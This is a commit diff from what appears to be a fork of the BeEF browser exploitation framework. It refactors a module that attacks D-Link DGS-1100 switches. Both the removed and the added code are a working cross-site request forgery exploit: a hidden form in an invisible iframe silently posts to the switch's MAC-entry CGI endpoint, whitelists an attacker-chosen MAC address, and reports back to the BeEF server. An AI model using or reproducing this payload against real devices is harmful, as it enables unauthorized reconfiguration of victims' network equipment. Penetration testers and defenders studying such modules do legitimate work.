Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adjusting to use XsrfForm

Browse Source
This commit is contained in:
Nicholas Starke
2017-02-25 08:03:45 -06:00
parent 37b83e3a38
commit 558646bd85
1 changed files with 5 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
View File

@@ -11,34 +11,11 @@ beef.execute(function() {
var mac = '<%= @mac %>';
var vlanid = '<%= @vlanid %>';
var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', base + "/cgi/mac_entry_add.cgi");
form.setAttribute('method', 'POST');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'fwdport');
input.setAttribute('value', port);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'vid');
input.setAttribute('value', vlanid);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'macaddr');
input.setAttribute('value', mac);
form.appendChild(input);
dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/mac_entry_add.cgi', 'POST', 'application/x-www-form-urlencoded', [
{ type: 'hidden', name: 'fwdport', value: port },
{ type: 'hidden', name: 'vid', value: vlanid },
{ type: 'hidden', name: 'macaddr', value: mac }
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");